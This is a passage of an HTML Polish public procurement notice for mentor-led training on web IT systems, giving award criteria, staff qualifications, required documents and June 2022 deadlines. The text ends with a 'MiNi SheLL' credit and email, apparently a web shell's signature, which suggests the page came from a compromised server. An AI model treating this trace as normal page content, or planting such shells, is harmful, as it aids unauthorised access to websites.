class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie ze sposobem oceny ofert określonym w Rozdziale 22 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">53</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Personelu Kluczowego &#34;D&#34;</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">47</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący<br/>zdolności technicznej lub zawodowej. Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>7.1.1. w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie – należycie wykonał lub wykonuje co najmniej 2 (dwie) usługi polegające na przeszkoleniu co<br/>najmniej 500 (pięciuset) osób, przy czym co najmniej jedna z tych usług dotyczyła szkolenia/szkoleń w trybie stacjonarnym<br/>lub online z zakresu obsługi webowych systemów informatycznych.<br/><br/>Uwaga:<br/>- Zamawiający nie dopuszcza możliwości sumowania wartości kilku umów w celu wykazywania konkretnej usługi określonej<br/>wyżej;<br/>- przez jedną usługę, Zamawiający rozumie usługę wykonaną (wykonywaną) na podstawie jednego kontraktu/ jednej<br/>umowy;<br/>- w przypadku, kiedy wyżej opisane usługi stanowią część usług o szerszym zakresie czy wartości, Wykonawca winien w<br/>wykazie usług wyodrębnić usługi, których wykonanie (wykonywanie) jest konieczne dla spełnienia warunku udziału w<br/>postępowaniu dotyczącego zdolności technicznej lub zawodowej;<br/>- w przypadku usług będących w trakcie wykonywania, wymagania odnośnie: zakresu wymaganej usługi, dotyczą części<br/>umowy już zrealizowanej (tj. od dnia rozpoczęcia wykonywania usługi do upływu terminu składania ofert) i te parametry<br/>(zakres) Wykonawca zobowiązany jest podać w wykazie usług.<br/><br/>7.1.2. dysponuje lub będzie dysponował wykwalifikowanym zespołem (zwanym dalej „Personelem Kluczowym”), który<br/>skieruje do realizacji niniejszego zamówienia, w tym:<br/><br/>7.1.2.1. (jednym) Opiekunem Merytorycznym Mentorów posiadającym:<br/>a) wykształcenie co najmniej wyższe I stopnia;<br/>b) doświadczenie w konstruowaniu, opisywaniu i opracowywaniu programów ramowych szkoleń, scenariuszy szkoleń i/lub<br/>scenariuszy zajęć, materiałów szkoleniowych dla uczestników oraz potrafi przekazywać swoją wiedzę merytoryczną innym;<br/>c) doświadczenie w prowadzeniu szkoleń lub zajęć edukacyjnych z dorosłymi lub starszą młodzieżą (w wieku od 15 do 19<br/>lat) w liczbie co najmniej 150 (stu pięćdziesięciu) godzin dydaktycznych;<br/>d) co najmniej 150 godzin dydaktycznych doświadczenia w prowadzeniu szkoleń z zakresu obsługi webowych systemów<br/>informatycznych nabytego w okresie ostatnich 5 lat przed upływem terminu składania ofert;<br/>e) umiejętność biegłej obsługi komputera.<br/><br/>Uwaga: Doświadczenie, o którym mowa w pkt 7.1.2.1. lit. c może być doświadczeniem nabytym przy prowadzeniu szkoleń z<br/>zakresu obsługi webowych systemów informatycznych, o którym mowa w pkt 7.1.2.1. lit. d, o ile zostały spełnione warunki<br/>dotyczące edukacyjnego charakteru szkoleń oraz wieku szkolonych osób (dorośli lub starsza młodzież w wieku od 5 do 19<br/>lat).<br/><br/>7.1.2.2. 14 (czternastoma) Mentorami, z których każdy posiada:<br/>a) wykształcenie co najmniej wyższe I stopnia;<br/>b) doświadczenie w prowadzeniu szkoleń lub zajęć edukacyjnych z dorosłymi lub starszą młodzieżą (w wieku od 15 do 19<br/>lat) w liczbie co najmniej 150 (stu pięćdziesięciu) godzin dydaktycznych;<br/>c) co najmniej 150 godzin dydaktycznych doświadczenia w prowadzeniu szkoleń z zakresu obsługi webowych systemów<br/>informatycznych nabytego w okresie ostatnich 5 lat przed upływem terminu składania ofert;<br/>d) umiejętność biegłej obsługi komputera.<br/><br/>Uwaga: Zamawiający nie dopuszcza łączenia ról osób wymienionych w punkcie 7.1.2.1. i punkcie 7.1.2.2. powyżej w celu<br/>wykazania warunku udziału w postępowaniu oraz uzyskania punktów w kryterium „Doświadczenie Personelu Kluczowego”.<br/>Uwaga: Doświadczenie, o którym mowa w pkt 7.1.2.2. lit. b może być doświadczeniem nabytym przy prowadzeniu szkoleń z<br/>zakresu obsługi webowych systemów informatycznych, o którym mowa w pkt 7.1.2.2. lit. c, o ile zostały spełnione warunki<br/>dotyczące edukacyjnego charakteru szkoleń oraz wieku szkolonych osób (dorośli lub starsza młodzież w wieku od 5 do 19<br/>lat). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, niżej wymienionych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>- oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w artykule 125 ustęp 1 ustawy Pzp (punkt 10<br/>SWZ). Wzór oświadczenia stanowi Załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, niżej wymienionych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/><br/>- wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 (trzech) miesięcy.<br/>Wykaz usług należy sporządzić zgodnie z Załącznikiem nr 5 do SWZ.<br/><br/>-Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wykaz osób należy sporządzić zgodnie z Załącznikiem nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o którym mowa w punkcie 7.4 SWZ (jeżeli<br/>dotyczy). Wzór zobowiązania – załącznik nr 9 do SWZ;<br/>2. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w punkcie 12.4 SWZ,<br/>sporządzone zgodnie z Załącznikiem nr 6 do SWZ (jeżeli dotyczy);<br/>sporządzone zgodnie z Załącznikiem nr 6 do SWZ (jeżeli dotyczy);<br/>3. dokument zawierający wyjaśnienia wraz uzasadnieniem, dlaczego zastrzeżone informacje stanowią tajemnicę<br/>przedsiębiorstwa (patrz punkt 19.6 SWZ ) -jeżeli Wykonawca zastrzega w poufności część informacji jako stanowiących<br/>tajemnicę przedsiębiorstwa;<br/>4. W celu potwierdzenia, że osoba/-y działająca/-e w imieniu Wykonawcy jest/są umocowana/-e do jego reprezentowania<br/>Zamawiający żąda złożenia:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru (Wykonawca nie jest zobowiązany do złożenia takich dokumentów, jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów);<br/>b) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy (jeżeli<br/>umocowanie do reprezentowania nie wynika z dokumentu rejestrowego, o którym mowa w punkcie 4 litera a) powyżej);<br/>c) postanowienie punktu 4 litera a) - b) stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>d) postanowienia punktu 4 litera a) – b) stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego<br/>zasoby na zasadach określonych w artykule 118 ustawy Pzp.<br/>Uwaga:<br/>- W przypadku wskazania przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których<br/>mowa w punkcie 4 litera a), pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych,<br/>Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez<br/>Zamawiającego podmiotowych środków dowodowych lub dokumentów;<br/>- W przypadku, gdy pełnomocnictwa udziela inna osoba niż uprawniony do reprezentowania podmiot z mocy prawa lub<br/>umowy spółki, do oferty należy dołączyć również pełnomocnictwo do dokonania tej czynności.<br/>5. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, wraz z ofertą,<br/>przedstawia, wraz z oświadczeniem, o którym mowa w artykule 125 ustęp 1 ustawy Pzp, także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunku<br/>udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>Każdy podmiot udostępniający zasoby składa odrębne oświadczenie sporządzone na podstawie Załącznika nr 4A do SWZ.<br/>Oświadczenie należy złożyć pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje<br/>również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich elektronicznych kopii dokumentów,<br/>których oryginały sporządzono w formie pisemnej;<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie artykule 108 ustęp 1, artykule 109 ustęp 1 punkt 4 ustawy Pzp oraz artykule 7 ust. 1 ustawy<br/>sankcyjnej, natomiast warunki udziału w postępowaniu określone w punkcie 7.1. SWZ Wykonawcy spełniają łącznie.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w punkcie 6<br/>poniżej (punkcie 10.2 SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku, o którym mowa w artykule 117 ustęp 3 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 6 do SWZ.<br/>5. Obowiązek złożenia oświadczenia, o którym mowa w punkcie 12.4 SWZ, dotyczy również wykonawców prowadzących<br/>działalność w formie spółki cywilnej, którzy na gruncie ustawy Pzp są wykonawcami wspólnie ubiegającymi się o udzielenie<br/>zamówienia.<br/>6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie z artykułu 125 ustęp 1 ustawy Pzp, wraz z ofertą, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy podmiot wypełnia i podpisuje odrębny formularz).<br/>Oświadczenia te mają potwierdzić brak podstaw wykluczenia oraz spełnianie warunku udziału w postępowaniu w zakresie,<br/>w jakim każdy z tych Wykonawców wykazuje spełnianie warunku udziału w postępowaniu.<br/>Każdy podmiot składa odrębne oświadczenie. Oświadczenie należy złożyć pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania Zamawiający opisał w Załączniku nr 2 do SWZ w paragrafie<br/>14. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pfron</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się również Wykonawcę wobec którego zachodzi którakolwiek z<br/>podstaw określonych w artykule 7 ustęp 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. poz. 835) dalej<br/>jako „ustawa sankcyjna”.<br/>2. Jeżeli Wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby Zamawiający zbada, czy nie<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>3. W przypadku wspólnego ubiegania się Wykonawców (dotyczy również wspólników spółki cywilnej) o udzielenie<br/>zamówienia, Zamawiający zbada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych Wykonawców.<br/>4. Środki ochrony prawnej przysługują na zasadach uregulowanych w Dziale IX ustawy Pzp.<br/>Informacje na temat składania odwołań można uzyskać w Urzędzie Zamówień Publicznych<br/>Departament Odwołań, ul. Postępu 17a, 02-676 Warszawa, strona internetowa: www.uzp.gov.pl, adres e-mail:<br/>odwolania@uzp.gov.pl,<br/>tel. +48 22 458 78 01.<br/>5. Przed zawarciem Umowy Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, dostarczy Zamawiającemu:<br/>5.1. informacje niezbędne do uzupełnienia treści umowy, np. imiona i nazwiska uprawnionych osób, które będą<br/>reprezentować Wykonawcę przy podpisaniu umowy, osoby do komunikacji itp.;<br/>5.2. pełnomocnictwo dla osób podpisujących umowę, jeśli ich umocowanie do podpisania umowy nie wynika z dokumentów<br/>załączonych do oferty;<br/>5.3. jeżeli zostanie wybrana oferta konsorcjum, Zamawiający może zażądać przed zawarciem umowy, przedłożenia kopii<br/>umowy regulującej współpracę Wykonawców tworzących konsorcjum. Z treści powyższej umowy powinny w szczególności<br/>wynikać: zasady współdziałania, zakres współuczestnictwa i podział obowiązków Wykonawców w wykonaniu przedmiotu<br/>zamówienia;<br/>6. Wykonawca przed zawarciem Umowy podda się Zamawiającemu weryfikacji wdrożenia przez Wykonawcę odpowiednich<br/>środków technicznych i organizacyjnych, zgodnych z przepisami o ochronie danych osobowych i chroniących prawa osób,<br/>których dane dotyczą.<br/>7. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia Umowy w sprawie<br/>zamówienia publicznego lub nie wniesie zabezpieczenia należytego wykonania Umowy, Zamawiający dokona ponownego<br/>badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców albo unieważni postępowanie.<br/>8. Zamawiający nie przewiduje: udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.<br/>9.Ofertę sporządza się, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę(y)<br/>upoważnioną(e) do reprezentowania Wykonawcy i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty.<br/>Oświadczenie<br/>Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz podmiotów udostępniających zasoby,<br/>na których zdolnościach lub sytuacji polega Wykonawca, o którym mowa w art. 125 ust. 1 ustawy Pzp (pkt 10 SWZ),<br/>sporządza się, pod rygorem nieważności, w<br/>formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Pozostałe wymagania formalne dotyczące składanych w postępowaniu<br/>podmiotowych środków dowodowych zawiera rozdział 19 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com